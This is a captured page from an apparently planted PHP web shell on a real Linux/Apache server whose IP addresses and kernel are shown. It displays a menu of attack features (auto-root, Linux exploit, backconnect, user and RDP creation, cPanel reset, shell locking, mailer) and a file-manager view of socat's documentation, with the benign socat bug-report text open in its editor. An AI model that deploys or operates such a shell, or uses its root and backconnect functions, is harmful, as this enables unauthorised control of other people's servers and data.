Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.141.47.163
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
socat-1.7.3.2 /
[ HOME SHELL ]
Name
Size
Permission
Action
BUGREPORTS
746
B
-rw-r--r--
CHANGES
53.13
KB
-rw-r--r--
COPYING
17.67
KB
-rw-r--r--
COPYING.OpenSSL
6.13
KB
-rw-r--r--
DEVELOPMENT
8.29
KB
-rw-r--r--
EXAMPLES
16.47
KB
-rw-r--r--
FAQ
3.83
KB
-rw-r--r--
PORTING
3.02
KB
-rw-r--r--
README
11.37
KB
-rw-r--r--
SECURITY
1.81
KB
-rw-r--r--
daemon.sh
903
B
-rwxr-xr-x
ftp.sh
4.12
KB
-rwxr-xr-x
gatherinfo.sh
4.03
KB
-rwxr-xr-x
mail.sh
2.02
KB
-rwxr-xr-x
proxy.sh
1.98
KB
-rwxr-xr-x
proxyecho.sh
1.19
KB
-rwxr-xr-x
readline-test.sh
1.25
KB
-rwxr-xr-x
readline.sh
689
B
-rwxr-xr-x
socat_buildscript_for_android....
3.5
KB
-rwxr-xr-x
socks4a-echo.sh
2.51
KB
-rwxr-xr-x
socks4echo.sh
2.3
KB
-rwxr-xr-x
test.sh
390.77
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : BUGREPORTS
* If you have found a bug, i.e. socat SIGSEGV'ed, terminated abnormally without error message, did not comply to the documentation, or behaves different from your expectations, please send the following infos to socat@dest-unreach.org, as available: . output of "make info" in socat.out (you may remove the hostname in the first line to keep your privacy) . config.log . run your example with "socat -d -d -d -d -D ..." options, and include the log output . describe what you've done, and why you think socat did wrong * If you fixed a bug: Please do as described in the above paragraph, and include the modified files (or a patch file) * If you have contributions, problems etc: send available info and a description to the above address.
Close